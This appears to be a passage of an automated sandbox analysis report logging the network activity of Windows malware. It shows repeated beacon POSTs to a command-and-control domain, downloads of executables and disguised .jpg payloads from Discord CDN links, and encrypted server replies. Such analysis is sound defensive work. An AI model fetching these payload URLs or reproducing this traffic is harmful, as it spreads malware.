Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbxuhdvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axwrxhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkannuwrja.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://naytoe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bggaruuq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcaielan.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sangssr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eyepud.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkvmgnfi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbdqtrry.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkaqxiicba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://taupwpt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blslkdmyqd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chucxho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://futucrxk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iyxlcdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayllaycsn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcwoodah.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtlkrwbu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohksryibbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aandk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbvoxgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhsdwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akpvscwiwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fftaocheul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqktie.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkhdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhnkknumd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: hajezey1.top
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49818 -> 93.115.20.139:28978
Source: C1B2.exe, 00000015.00000002.614812023.000000000156F000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: C1B2.exe String found in binary or memory: http://fontello.com
Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmp String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: explorer.exe, 00000004.00000000.287991711.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001B.00000000.419935360.000000000040C000.00000002.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: C1B2.exe String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_004070B4 HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 29_2_004070B4
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/019cd02588367c4185228009642767b5fca228df HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/07191d3d9db3dbffa0d8f6d32b0cace6fdafa466 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
